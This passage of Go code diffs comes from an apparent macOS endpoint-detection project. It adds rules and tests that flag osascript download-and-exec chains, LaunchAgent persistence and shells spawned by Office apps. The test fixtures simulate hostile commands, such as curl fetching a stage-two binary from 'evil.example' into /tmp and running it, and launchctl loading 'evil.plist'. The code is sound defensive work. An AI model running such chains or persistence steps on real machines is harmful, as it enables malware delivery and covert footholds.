+			if downloadBinaries[c.Path] {
+				downloader = c
+			}
+			if isSuspiciousPath(c.Path) {
+				tempExec = c
+			}
+		}
+		if downloader == nil || tempExec == nil {
+			continue
+		}
+
+		// The finding links to the temp-path process — that's the thing responders need
+		// to investigate first. The download child + the osascript itself are both in the
+		// event_ids so the alert detail view can render the full chain.
+		osaProc, err := s.GetProcessByPID(ctx, evt.HostID, p.PID, evt.TimestampNs)
+		if err != nil {
+			return nil, fmt.Errorf("get osascript process pid %d: %w", p.PID, err)
+		}
+		if osaProc == nil {
+			continue
+		}
+
+		findings = append(findings, detection.Finding{
+			HostID:   evt.HostID,
+			RuleID:   r.ID(),
+			Severity: detection.SeverityCritical,
+			Title:    "osascript download-and-exec chain",
+			Description: fmt.Sprintf(
+				"osascript → %s → %s",
+				downloader.Path, tempExec.Path,
+			),
+			ProcessID: tempExec.ID,
+			EventIDs:  []string{evt.EventID},
+		})
+	}
+	return findings, nil
+}

--- a/server/detection/rules/osascript_network_exec_test.go
+++ b/server/detection/rules/osascript_network_exec_test.go
@@ -1,0 +1,97 @@
+package rules
+
+import (
+	"encoding/json"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+
+	"github.com/fleetdm/edr/server/store"
+)
+
+// TestOsascriptNetworkExec exercises the download-and-exec chain detection. The rule
+// fires only when a single osascript process's 30s descendant tree contains BOTH a
+// curl/wget exec AND an exec out of a suspicious path — either alone is not enough.
+func TestOsascriptNetworkExec_DetectsChain(t *testing.T) {
+	s := store.OpenTestStore(t)
+	ctx := t.Context()
+
+	// Tree: launchd (1) → osascript (50) → curl (100) + /tmp/stage2 (200)
+	events := []store.Event{
+		{EventID: "fork-osa", HostID: "host-a", TimestampNs: 1000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":50,"parent_pid":1}`)},
+		{EventID: "exec-osa", HostID: "host-a", TimestampNs: 1100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":50,"ppid":1,"path":"/usr/bin/osascript","args":["osascript","-e","..."],"uid":501,"gid":20}`)},
+		{EventID: "fork-curl", HostID: "host-a", TimestampNs: 2000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":100,"parent_pid":50}`)},
+		{EventID: "exec-curl", HostID: "host-a", TimestampNs: 2100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":100,"ppid":50,"path":"/usr/bin/curl","args":["curl","-o","/tmp/stage2","https://evil.example/x"],"uid":501,"gid":20}`)},
+		{EventID: "fork-stage2", HostID: "host-a", TimestampNs: 3000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":200,"parent_pid":50}`)},
+		{EventID: "exec-stage2", HostID: "host-a", TimestampNs: 3100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":200,"ppid":50,"path":"/tmp/stage2","args":["/tmp/stage2"],"uid":501,"gid":20}`)},
+	}
+	require.NoError(t, s.InsertEvents(ctx, events))
+	materialize(t, s, events)
+
+	rule := &OsascriptNetworkExec{}
+	findings, err := rule.Evaluate(ctx, events, s)
+	require.NoError(t, err)
+	require.Len(t, findings, 1)
+	f := findings[0]
+	assert.Equal(t, "osascript_network_exec", f.RuleID)
+	assert.Equal(t, "critical", f.Severity)
+	assert.Contains(t, f.Description, "/usr/bin/curl")
+	assert.Contains(t, f.Description, "/tmp/stage2")
+}
+
+// Negative: osascript alone with a curl child but no temp-path exec. Download without a
+// following exec is not a droppers pattern — could be a legitimate script fetch.
+func TestOsascriptNetworkExec_DownloadOnlyDoesNotFire(t *testing.T) {
+	s := store.OpenTestStore(t)
+	ctx := t.Context()
+
+	events := []store.Event{
+		{EventID: "fork-osa", HostID: "host-a", TimestampNs: 1000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":50,"parent_pid":1}`)},
+		{EventID: "exec-osa", HostID: "host-a", TimestampNs: 1100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":50,"ppid":1,"path":"/usr/bin/osascript","args":["osascript","-e","..."],"uid":501,"gid":20}`)},
+		{EventID: "fork-curl", HostID: "host-a", TimestampNs: 2000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":100,"parent_pid":50}`)},
+		{EventID: "exec-curl", HostID: "host-a", TimestampNs: 2100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":100,"ppid":50,"path":"/usr/bin/curl","args":["curl","https://example.com"],"uid":501,"gid":20}`)},
+	}
+	require.NoError(t, s.InsertEvents(ctx, events))
+	materialize(t, s, events)
+
+	rule := &OsascriptNetworkExec{}
+	findings, err := rule.Evaluate(ctx, events, s)
+	require.NoError(t, err)
+	assert.Empty(t, findings)
+}
+
+// Negative: temp-path exec without the download child. The parent suspicious_exec rule
+// covers this case; osascript_network_exec stays silent.
+func TestOsascriptNetworkExec_TempExecWithoutDownloadDoesNotFire(t *testing.T) {
+	s := store.OpenTestStore(t)
+	ctx := t.Context()
+
+	events := []store.Event{
+		{EventID: "fork-osa", HostID: "host-a", TimestampNs: 1000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":50,"parent_pid":1}`)},
+		{EventID: "exec-osa", HostID: "host-a", TimestampNs: 1100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":50,"ppid":1,"path":"/usr/bin/osascript","args":["osascript","-e","..."],"uid":501,"gid":20}`)},
+		{EventID: "fork-stage2", HostID: "host-a", TimestampNs: 3000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":200,"parent_pid":50}`)},
+		{EventID: "exec-stage2", HostID: "host-a", TimestampNs: 3100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":200,"ppid":50,"path":"/tmp/stage2","args":["/tmp/stage2"],"uid":501,"gid":20}`)},
+	}
+	require.NoError(t, s.InsertEvents(ctx, events))
+	materialize(t, s, events)
+
+	rule := &OsascriptNetworkExec{}
+	findings, err := rule.Evaluate(ctx, events, s)
+	require.NoError(t, err)
+	assert.Empty(t, findings)
+}

--- a/server/detection/rules/osascript_network_exec_test.go
+++ b/server/detection/rules/osascript_network_exec_test.go
@@ -71,6 +71,42 @@ func TestOsascriptNetworkExec_DownloadOnlyDoesNotFire(t *testing.T) {
 	assert.Empty(t, findings)
 }
 
+// Multi-hop chain: osascript → sh → curl + /tmp/stage2 exec via a grandchild. Real
+// droppers spawn an intermediate shell; the direct-children-only scan missed this until
+// the BFS fix.
+func TestOsascriptNetworkExec_DetectsGrandchildChain(t *testing.T) {
+	s := store.OpenTestStore(t)
+	ctx := t.Context()
+
+	events := []store.Event{
+		{EventID: "fork-osa", HostID: "host-a", TimestampNs: 1000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":50,"parent_pid":1}`)},
+		{EventID: "exec-osa", HostID: "host-a", TimestampNs: 1100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":50,"ppid":1,"path":"/usr/bin/osascript","args":["osascript","-e","..."],"uid":501,"gid":20}`)},
+		{EventID: "fork-sh", HostID: "host-a", TimestampNs: 2000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":60,"parent_pid":50}`)},
+		{EventID: "exec-sh", HostID: "host-a", TimestampNs: 2100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":60,"ppid":50,"path":"/bin/sh","args":["sh","-c","curl | run"],"uid":501,"gid":20}`)},
+		{EventID: "fork-curl", HostID: "host-a", TimestampNs: 3000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":100,"parent_pid":60}`)},
+		{EventID: "exec-curl", HostID: "host-a", TimestampNs: 3100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":100,"ppid":60,"path":"/usr/bin/curl","args":["curl","-o","/tmp/stage2","https://evil"],"uid":501,"gid":20}`)},
+		{EventID: "fork-stage2", HostID: "host-a", TimestampNs: 4000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":200,"parent_pid":60}`)},
+		{EventID: "exec-stage2", HostID: "host-a", TimestampNs: 4100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":200,"ppid":60,"path":"/tmp/stage2","args":["/tmp/stage2"],"uid":501,"gid":20}`)},
+	}
+	require.NoError(t, s.InsertEvents(ctx, events))
+	materialize(t, s, events)
+
+	rule := &OsascriptNetworkExec{}
+	findings, err := rule.Evaluate(ctx, events, s)
+	require.NoError(t, err)
+	require.Len(t, findings, 1, "BFS traversal must see the grandchild curl + /tmp/stage2")
+	assert.Contains(t, findings[0].Description, "/usr/bin/curl")
+	assert.Contains(t, findings[0].Description, "/tmp/stage2")
+}
+
 // Negative: temp-path exec without the download child. The parent suspicious_exec rule
 // covers this case; osascript_network_exec stays silent.
 func TestOsascriptNetworkExec_TempExecWithoutDownloadDoesNotFire(t *testing.T) {

--- a/server/detection/rules/persistence_launchagent.go
+++ b/server/detection/rules/persistence_launchagent.go
@@ -1,0 +1,128 @@
+package rules
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"regexp"
+	"strings"
+
+	"github.com/fleetdm/edr/server/detection"
+	"github.com/fleetdm/edr/server/store"
+)
+
+// PersistenceLaunchAgent fires when a process calls `launchctl load` or
+// `launchctl bootstrap` referencing a plist under `~/Library/LaunchAgents/` or
+// `/Library/LaunchAgents/` — the canonical macOS persistence mechanism. Operators can
+// silence expected plists via `EDR_LAUNCHAGENT_ALLOWLIST` (comma-separated absolute paths).
+//
+// MITRE ATT&CK: T1547.011 (Boot or Logon Autostart Execution: Launch Agent)
+type PersistenceLaunchAgent struct {
+	// AllowedPlists is the set of plist paths the operator has pre-blessed. The rule
+	// skips findings whose target plist matches any entry (exact string match).
+	AllowedPlists map[string]struct{}
+}
+
+func (r *PersistenceLaunchAgent) ID() string { return "persistence_launchagent" }
+
+// launchctlPaths covers the common macOS launchctl binary locations.
+var launchctlPaths = map[string]bool{
+	"/bin/launchctl":     true,
+	"/usr/bin/launchctl": true,
+}
+
+// launchAgentPath matches arguments that reference a plist under a LaunchAgents directory.
+// We accept both system-wide (/Library/LaunchAgents) and per-user (~ / /Users/<u>/Library)
+// locations — an attacker-planted plist at either is a persistence mechanism.
+var launchAgentPath = regexp.MustCompile(`(?i)(^|/)(Users/[^/]+/)?Library/LaunchAgents/[^/]+\.plist$`)
+
+type persistenceLaunchCtlPayload struct {
+	PID  int      `json:"pid"`
+	PPID int      `json:"ppid"`
+	Path string   `json:"path"`
+	Args []string `json:"args"`
+}
+
+func (r *PersistenceLaunchAgent) Evaluate(ctx context.Context, events []store.Event, s *store.Store) ([]detection.Finding, error) {
+	var findings []detection.Finding
+	for _, evt := range events {
+		if evt.EventType != "exec" {
+			continue
+		}
+		var p persistenceLaunchCtlPayload
+		if err := json.Unmarshal(evt.Payload, &p); err != nil {
+			continue
+		}
+		if !launchctlPaths[p.Path] {
+			continue
+		}
+
+		subcommand, plistPath := extractLaunchctlSubcommand(p.Args)
+		if subcommand != "load" && subcommand != "bootstrap" {
+			continue
+		}
+		if plistPath == "" || !launchAgentPath.MatchString(plistPath) {
+			continue
+		}
+		if r.allowed(plistPath) {
+			continue
+		}
+
+		// Look up the process row so the alert can link to the process detail view. If it's
+		// not yet materialised we skip — the next batch re-evaluates once the processor
+		// lands the row. Safer than firing an alert we can't pivot from.
+		proc, err := s.GetProcessByPID(ctx, evt.HostID, p.PID, evt.TimestampNs)
+		if err != nil {
+			return nil, fmt.Errorf("get process pid %d: %w", p.PID, err)
+		}
+		if proc == nil {
+			continue
+		}
+
+		findings = append(findings, detection.Finding{
+			HostID:      evt.HostID,
+			RuleID:      r.ID(),
+			Severity:    detection.SeverityHigh,
+			Title:       "LaunchAgent persistence attempt",
+			Description: fmt.Sprintf("launchctl %s %s", subcommand, plistPath),
+			ProcessID:   proc.ID,
+			EventIDs:    []string{evt.EventID},
+		})
+	}
+	return findings, nil
+}
+
+func (r *PersistenceLaunchAgent) allowed(path string) bool {
+	if r.AllowedPlists == nil {
+		return false
+	}
+	_, ok := r.AllowedPlists[path]
+	return ok
+}
+
+// extractLaunchctlSubcommand pulls the subcommand (`load`, `bootstrap`, `unload`, etc.) and
+// the first path-looking argument out of an argv. argv[0] is the binary path; we look for
+// the first non-flag token for the subcommand and then walk the rest for a path.
+//
+// Example inputs:
+//
+//	[]string{"/bin/launchctl", "load", "/Users/alice/Library/LaunchAgents/evil.plist"}
+//	  → ("load", "/Users/alice/Library/LaunchAgents/evil.plist")
+//	[]string{"/bin/launchctl", "load", "-w", "/Library/LaunchAgents/foo.plist"}
+//	  → ("load", "/Library/LaunchAgents/foo.plist")
+func extractLaunchctlSubcommand(args []string) (subcommand, plistPath string) {
+	for i := 1; i < len(args); i++ {
+		if args[i] == "" || strings.HasPrefix(args[i], "-") {
+			continue
+		}
+		if subcommand == "" {
+			subcommand = args[i]
+			continue
+		}
+		if plistPath == "" && strings.Contains(args[i], "/") {
+			plistPath = args[i]
+			break
+		}
+	}
+	return subcommand, plistPath
+}

--- a/server/detection/rules/persistence_launchagent.go
+++ b/server/detection/rules/persistence_launchagent.go
@@ -101,8 +101,15 @@ func (r *PersistenceLaunchAgent) allowed(path string) bool {
 }
 
 // extractLaunchctlSubcommand pulls the subcommand (`load`, `bootstrap`, `unload`, etc.) and
-// the first path-looking argument out of an argv. argv[0] is the binary path; we look for
-// the first non-flag token for the subcommand and then walk the rest for a path.
+// the first LaunchAgents plist argument out of an argv. argv[0] is the binary path; we look
+// for the first non-flag token for the subcommand and then keep walking until we find an
+// arg that looks like an actual LaunchAgents plist.
+//
+// Why "keep walking" rather than "first arg with /": `launchctl bootstrap gui/501
+// /Users/alice/Library/LaunchAgents/evil.plist` puts the launch-domain specifier
+// ("gui/501") before the plist path. A naive "first slash-containing arg" grab catches
+// the domain and then the rule drops the event entirely. Matching on `launchAgentPath`
+// keeps the scan going past launch domains so the plist is the thing we return.
 //
 // Example inputs:
 //
@@ -110,6 +117,8 @@ func (r *PersistenceLaunchAgent) allowed(path string) bool {
 //	  → ("load", "/Users/alice/Library/LaunchAgents/evil.plist")
 //	[]string{"/bin/launchctl", "load", "-w", "/Library/LaunchAgents/foo.plist"}
 //	  → ("load", "/Library/LaunchAgents/foo.plist")
+//	[]string{"/bin/launchctl", "bootstrap", "gui/501", "/Users/alice/Library/LaunchAgents/evil.plist"}
+//	  → ("bootstrap", "/Users/alice/Library/LaunchAgents/evil.plist")
 func extractLaunchctlSubcommand(args []string) (subcommand, plistPath string) {
 	for i := 1; i < len(args); i++ {
 		if args[i] == "" || strings.HasPrefix(args[i], "-") {
@@ -119,10 +128,9 @@ func extractLaunchctlSubcommand(args []string) (subcommand, plistPath string) {
 			subcommand = args[i]
 			continue
 		}
-		if plistPath == "" && strings.Contains(args[i], "/") {
-			plistPath = args[i]
-			break
+		if launchAgentPath.MatchString(args[i]) {
+			return subcommand, args[i]
 		}
 	}
-	return subcommand, plistPath
+	return subcommand, ""
 }

--- a/server/detection/rules/persistence_launchagent_test.go
+++ b/server/detection/rules/persistence_launchagent_test.go
@@ -84,6 +84,17 @@ func TestPersistenceLaunchAgent_TableDriven(t *testing.T) {
 			wantFinding: true,
 			wantDescHas: "com.stealth.plist",
 		},
+		{
+			// Regression: CodeRabbit flagged that `bootstrap gui/501 <plist>` was captured
+			// with "gui/501" as the plistPath (first arg containing "/"), so the rule
+			// dropped the event. Matching on the LaunchAgents plist regex fixes it.
+			name:        "bootstrap with launch-domain specifier still fires",
+			args:        []string{"/bin/launchctl", "bootstrap", "gui/501", "/Users/alice/Library/LaunchAgents/com.domain.plist"},
+			path:        "/bin/launchctl",
+			parentPath:  "/bin/bash",
+			wantFinding: true,
+			wantDescHas: "com.domain.plist",
+		},
 	}
 
 	for _, tc := range cases {

--- a/server/detection/rules/persistence_launchagent_test.go
+++ b/server/detection/rules/persistence_launchagent_test.go
@@ -1,0 +1,130 @@
+package rules
+
+import (
+	"encoding/json"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+
+	"github.com/fleetdm/edr/server/store"
+)
+
+func TestPersistenceLaunchAgent_TableDriven(t *testing.T) {
+	type fixture struct {
+		name          string
+		args          []string
+		path          string
+		parentPath    string
+		wantFinding   bool
+		wantDescHas   string
+		allowedPlists map[string]struct{}
+	}
+
+	cases := []fixture{
+		{
+			name:        "user-level LaunchAgent load fires",
+			args:        []string{"/bin/launchctl", "load", "/Users/alice/Library/LaunchAgents/com.evil.agent.plist"},
+			path:        "/bin/launchctl",
+			parentPath:  "/bin/bash",
+			wantFinding: true,
+			wantDescHas: "com.evil.agent.plist",
+		},
+		{
+			name:        "system-level LaunchAgent bootstrap fires",
+			args:        []string{"/bin/launchctl", "bootstrap", "system", "/Library/LaunchAgents/com.evil.root.plist"},
+			path:        "/bin/launchctl",
+			parentPath:  "/usr/bin/sudo",
+			wantFinding: true,
+			wantDescHas: "com.evil.root.plist",
+		},
+		{
+			name:        "launchctl unload does NOT fire — removing persistence is benign",
+			args:        []string{"/bin/launchctl", "unload", "/Users/alice/Library/LaunchAgents/com.evil.agent.plist"},
+			path:        "/bin/launchctl",
+			parentPath:  "/bin/bash",
+			wantFinding: false,
+		},
+		{
+			name:        "launchctl list does NOT fire — no plist argument",
+			args:        []string{"/bin/launchctl", "list"},
+			path:        "/bin/launchctl",
+			parentPath:  "/bin/bash",
+			wantFinding: false,
+		},
+		{
+			name:        "non-launchctl binary does NOT fire",
+			args:        []string{"/bin/ls", "/Users/alice/Library/LaunchAgents/"},
+			path:        "/bin/ls",
+			parentPath:  "/bin/bash",
+			wantFinding: false,
+		},
+		{
+			name:        "plist outside LaunchAgents dir does NOT fire",
+			args:        []string{"/bin/launchctl", "load", "/opt/homebrew/Cellar/postgres/foo.plist"},
+			path:        "/bin/launchctl",
+			parentPath:  "/bin/bash",
+			wantFinding: false,
+		},
+		{
+			name:        "allowlisted plist does NOT fire",
+			args:        []string{"/bin/launchctl", "load", "/Library/LaunchAgents/com.okta.agent.plist"},
+			path:        "/bin/launchctl",
+			parentPath:  "/bin/bash",
+			wantFinding: false,
+			allowedPlists: map[string]struct{}{
+				"/Library/LaunchAgents/com.okta.agent.plist": {},
+			},
+		},
+		{
+			name:        "load with -w flag still fires (flag ignored during arg walk)",
+			args:        []string{"/bin/launchctl", "load", "-w", "/Users/bob/Library/LaunchAgents/com.stealth.plist"},
+			path:        "/bin/launchctl",
+			parentPath:  "/bin/bash",
+			wantFinding: true,
+			wantDescHas: "com.stealth.plist",
+		},
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			s := store.OpenTestStore(t)
+			ctx := t.Context()
+
+			parentPayload, _ := json.Marshal(map[string]any{
+				"pid": 50, "ppid": 1, "path": tc.parentPath, "args": []string{tc.parentPath},
+				"uid": 501, "gid": 20,
+			})
+			targetPayload, _ := json.Marshal(map[string]any{
+				"pid": 100, "ppid": 50, "path": tc.path, "args": tc.args,
+				"uid": 501, "gid": 20,
+			})
+			events := []store.Event{
+				{EventID: "fork-parent", HostID: "host-a", TimestampNs: 1000, EventType: "fork",
+					Payload: json.RawMessage(`{"child_pid":50,"parent_pid":1}`)},
+				{EventID: "exec-parent", HostID: "host-a", TimestampNs: 1100, EventType: "exec",
+					Payload: parentPayload},
+				{EventID: "fork-target", HostID: "host-a", TimestampNs: 2000, EventType: "fork",
+					Payload: json.RawMessage(`{"child_pid":100,"parent_pid":50}`)},
+				{EventID: "exec-target", HostID: "host-a", TimestampNs: 2100, EventType: "exec",
+					Payload: targetPayload},
+			}
+			require.NoError(t, s.InsertEvents(ctx, events))
+			materialize(t, s, events)
+
+			rule := &PersistenceLaunchAgent{AllowedPlists: tc.allowedPlists}
+			findings, err := rule.Evaluate(ctx, events, s)
+			require.NoError(t, err)
+
+			if !tc.wantFinding {
+				assert.Empty(t, findings)
+				return
+			}
+			require.Len(t, findings, 1)
+			assert.Equal(t, "persistence_launchagent", findings[0].RuleID)
+			assert.Equal(t, "high", findings[0].Severity)
+			assert.Contains(t, findings[0].Description, tc.wantDescHas)
+			assert.Contains(t, findings[0].EventIDs, "exec-target")
+		})
+	}
+}

--- a/server/detection/rules/shell_from_office.go
+++ b/server/detection/rules/shell_from_office.go
@@ -1,0 +1,101 @@
+package rules
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"strings"
+
+	"github.com/fleetdm/edr/server/detection"
+	"github.com/fleetdm/edr/server/store"
+)
+
+// ShellFromOffice fires when a shell (/bin/sh, /bin/bash, /bin/zsh, etc.) is spawned
+// whose parent process is one of the Microsoft Office apps. VBA/Word-macro payloads
+// frequently shell out to bootstrap a second-stage; modern macOS keeps the Office
+// binaries in /Applications/Microsoft {Word,Excel,PowerPoint,Outlook}.app/.
+//
+// MITRE ATT&CK: T1566.001 (Phishing: Spearphishing Attachment) + T1059 (Shell)
+type ShellFromOffice struct{}
+
+func (r *ShellFromOffice) ID() string { return "shell_from_office" }
+
+// officeBinaries is the set of macOS Office executable paths that, as a parent, make a
+// shell exec suspicious. We match full paths, not substrings, so a user-named file
+// like `/tmp/Microsoft Word` cannot accidentally silence or spoof a finding.
+var officeBinaries = map[string]bool{
+	"/Applications/Microsoft Word.app/Contents/MacOS/Microsoft Word":             true,
+	"/Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel":           true,
+	"/Applications/Microsoft PowerPoint.app/Contents/MacOS/Microsoft PowerPoint": true,
+	"/Applications/Microsoft Outlook.app/Contents/MacOS/Microsoft Outlook":       true,
+}
+
+type shellFromOfficePayload struct {
+	PID  int    `json:"pid"`
+	PPID int    `json:"ppid"`
+	Path string `json:"path"`
+}
+
+func (r *ShellFromOffice) Evaluate(ctx context.Context, events []store.Event, s *store.Store) ([]detection.Finding, error) {
+	var findings []detection.Finding
+	for _, evt := range events {
+		if evt.EventType != "exec" {
+			continue
+		}
+		var p shellFromOfficePayload
+		if err := json.Unmarshal(evt.Payload, &p); err != nil {
+			continue
+		}
+		if !shellPaths[p.Path] {
+			continue
+		}
+
+		parent, err := s.GetProcessByPID(ctx, evt.HostID, p.PPID, evt.TimestampNs)
+		if err != nil {
+			return nil, fmt.Errorf("get parent pid %d: %w", p.PPID, err)
+		}
+		if parent == nil {
+			// Parent not yet materialised — skip; the processor will re-feed this event in
+			// the next batch once the parent row lands.
+			continue
+		}
+		if !officeBinaries[parent.Path] {
+			continue
+		}
+
+		proc, err := s.GetProcessByPID(ctx, evt.HostID, p.PID, evt.TimestampNs)
+		if err != nil {
+			return nil, fmt.Errorf("get process pid %d: %w", p.PID, err)
+		}
+		if proc == nil {
+			continue
+		}
+
+		findings = append(findings, detection.Finding{
+			HostID:      evt.HostID,
+			RuleID:      r.ID(),
+			Severity:    detection.SeverityHigh,
+			Title:       "Shell spawned from Office app",
+			Description: fmt.Sprintf("%s → %s", prettyOfficeParent(parent.Path), p.Path),
+			ProcessID:   proc.ID,
+			EventIDs:    []string{evt.EventID},
+		})
+	}
+	return findings, nil
+}
+
+// prettyOfficeParent strips the /Applications/… prefix so the alert description stays
+// legible ("Microsoft Word → /bin/bash" rather than the full bundle path).
+func prettyOfficeParent(p string) string {
+	const prefix = "/Applications/"
+	if !strings.HasPrefix(p, prefix) {
+		return p
+	}
+	// Trim prefix + `.app/Contents/MacOS/...` tail. Any unexpected shape falls back to
+	// the raw path.
+	rest := p[len(prefix):]
+	if idx := strings.Index(rest, ".app"); idx > 0 {
+		return rest[:idx]
+	}
+	return p
+}

--- a/server/detection/rules/shell_from_office.go
+++ b/server/detection/rules/shell_from_office.go
@@ -55,8 +55,14 @@ func (r *ShellFromOffice) Evaluate(ctx context.Context, events []store.Event, s 
 			return nil, fmt.Errorf("get parent pid %d: %w", p.PPID, err)
 		}
 		if parent == nil {
-			// Parent not yet materialised — skip; the processor will re-feed this event in
-			// the next batch once the parent row lands.
+			// Parent not yet materialised. The processor marks the whole batch processed
+			// after Evaluate returns, so a re-feed does not happen automatically — this
+			// miss is accepted for Phase 2. In practice the graph builder lands parents
+			// before exec-driven rules because the fork + exec events are in the same
+			// batch and the builder runs before the detection engine. A deferred retry
+			// queue ("evaluate later when the parent shows up") is Phase 4 scope. This
+			// same trade-off applies to the other rules (suspicious_exec, persistence_*)
+			// that depend on process lookups; see claude/mvp/plan.md Phase 4 notes.
 			continue
 		}
 		if !officeBinaries[parent.Path] {

--- a/server/detection/rules/shell_from_office_test.go
+++ b/server/detection/rules/shell_from_office_test.go
@@ -1,0 +1,111 @@
+package rules
+
+import (
+	"encoding/json"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+
+	"github.com/fleetdm/edr/server/store"
+)
+
+func TestShellFromOffice_TableDriven(t *testing.T) {
+	type fixture struct {
+		name        string
+		parentPath  string
+		shellPath   string
+		wantFinding bool
+		wantDesc    string
+	}
+
+	cases := []fixture{
+		{
+			name:        "Word → bash fires",
+			parentPath:  "/Applications/Microsoft Word.app/Contents/MacOS/Microsoft Word",
+			shellPath:   "/bin/bash",
+			wantFinding: true,
+			wantDesc:    "Microsoft Word → /bin/bash",
+		},
+		{
+			name:        "Excel → zsh fires",
+			parentPath:  "/Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel",
+			shellPath:   "/bin/zsh",
+			wantFinding: true,
+			wantDesc:    "Microsoft Excel → /bin/zsh",
+		},
+		{
+			name:        "PowerPoint → sh fires",
+			parentPath:  "/Applications/Microsoft PowerPoint.app/Contents/MacOS/Microsoft PowerPoint",
+			shellPath:   "/bin/sh",
+			wantFinding: true,
+			wantDesc:    "Microsoft PowerPoint → /bin/sh",
+		},
+		{
+			name:        "Outlook → dash fires",
+			parentPath:  "/Applications/Microsoft Outlook.app/Contents/MacOS/Microsoft Outlook",
+			shellPath:   "/bin/dash",
+			wantFinding: true,
+			wantDesc:    "Microsoft Outlook → /bin/dash",
+		},
+		{
+			name:        "Terminal.app → bash does NOT fire — expected",
+			parentPath:  "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
+			shellPath:   "/bin/bash",
+			wantFinding: false,
+		},
+		{
+			name:        "spoofed path name does NOT fire — full-path match",
+			parentPath:  "/tmp/Microsoft Word",
+			shellPath:   "/bin/bash",
+			wantFinding: false,
+		},
+		{
+			name:        "Word → non-shell does NOT fire",
+			parentPath:  "/Applications/Microsoft Word.app/Contents/MacOS/Microsoft Word",
+			shellPath:   "/usr/bin/open",
+			wantFinding: false,
+		},
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			s := store.OpenTestStore(t)
+			ctx := t.Context()
+
+			parentPayload, _ := json.Marshal(map[string]any{
+				"pid": 50, "ppid": 1, "path": tc.parentPath, "args": []string{tc.parentPath},
+				"uid": 501, "gid": 20,
+			})
+			shellPayload, _ := json.Marshal(map[string]any{
+				"pid": 100, "ppid": 50, "path": tc.shellPath, "args": []string{tc.shellPath},
+				"uid": 501, "gid": 20,
+			})
+			events := []store.Event{
+				{EventID: "fork-parent", HostID: "host-a", TimestampNs: 1000, EventType: "fork",
+					Payload: json.RawMessage(`{"child_pid":50,"parent_pid":1}`)},
+				{EventID: "exec-parent", HostID: "host-a", TimestampNs: 1100, EventType: "exec",
+					Payload: parentPayload},
+				{EventID: "fork-shell", HostID: "host-a", TimestampNs: 2000, EventType: "fork",
+					Payload: json.RawMessage(`{"child_pid":100,"parent_pid":50}`)},
+				{EventID: "exec-shell", HostID: "host-a", TimestampNs: 2100, EventType: "exec",
+					Payload: shellPayload},
+			}
+			require.NoError(t, s.InsertEvents(ctx, events))
+			materialize(t, s, events)
+
+			rule := &ShellFromOffice{}
+			findings, err := rule.Evaluate(ctx, events, s)
+			require.NoError(t, err)
+
+			if !tc.wantFinding {
+				assert.Empty(t, findings)
+				return
+			}
+			require.Len(t, findings, 1)
+			assert.Equal(t, "shell_from_office", findings[0].RuleID)
+			assert.Equal(t, "high", findings[0].Severity)
+			assert.Equal(t, tc.wantDesc, findings[0].Description)
+		})
+	}
+}

--- a/server/enrollment/enrollment.go
+++ b/server/enrollment/enrollment.go
@@ -137,6 +137,20 @@ func (s *Store) Verify(ctx context.Context, token string) (string, error) {
 	return row.HostID, nil
 }
 
+// ActiveHostIDs returns the host_id of every currently-active (non-revoked) enrollment.
+// Phase 2 uses this to fan out policy updates to the set of hosts that still have a
+// valid token; returning just the id column keeps the payload small when the caller is
+// already going to look up the full row by id.
+func (s *Store) ActiveHostIDs(ctx context.Context) ([]string, error) {
+	var ids []string
+	if err := s.db.SelectContext(ctx, &ids, `
+		SELECT host_id FROM enrollments WHERE revoked_at IS NULL ORDER BY host_id
+	`); err != nil {
+		return nil, fmt.Errorf("list active host ids: %w", err)
+	}
+	return ids, nil
+}
+
 // List returns every enrollment row, active + revoked, for the admin UI. The token hash/salt
 // columns are intentionally omitted.
 func (s *Store) List(ctx context.Context) ([]Enrollment, error) {

--- a/server/enrollment/enrollment_test.go
+++ b/server/enrollment/enrollment_test.go
@@ -395,16 +395,24 @@ func TestHandler_EnrollQueuesInitialPolicy(t *testing.T) {
 	defer resp.Body.Close()
 	require.Equal(t, http.StatusOK, resp.StatusCode)
 
-	// Exactly one pending set_blocklist command with the seeded policy.
-	cmds, err := s.ListCommands(t.Context(), testUUID, "pending")
-	require.NoError(t, err)
+	// Phase 2: the initial policy enqueue runs in a detached goroutine so enroll latency
+	// is not coupled to the command insert. Poll until the row lands (with a generous
+	// timeout that tolerates CI jitter but would still catch a dropped goroutine).
 	var got []store.Command
-	for _, c := range cmds {
-		if c.CommandType == "set_blocklist" {
-			got = append(got, c)
+	require.Eventually(t, func() bool {
+		cmds, err := s.ListCommands(t.Context(), testUUID, "pending")
+		if err != nil {
+			return false
 		}
-	}
-	require.Len(t, got, 1)
+		got = got[:0]
+		for _, c := range cmds {
+			if c.CommandType == "set_blocklist" {
+				got = append(got, c)
+			}
+		}
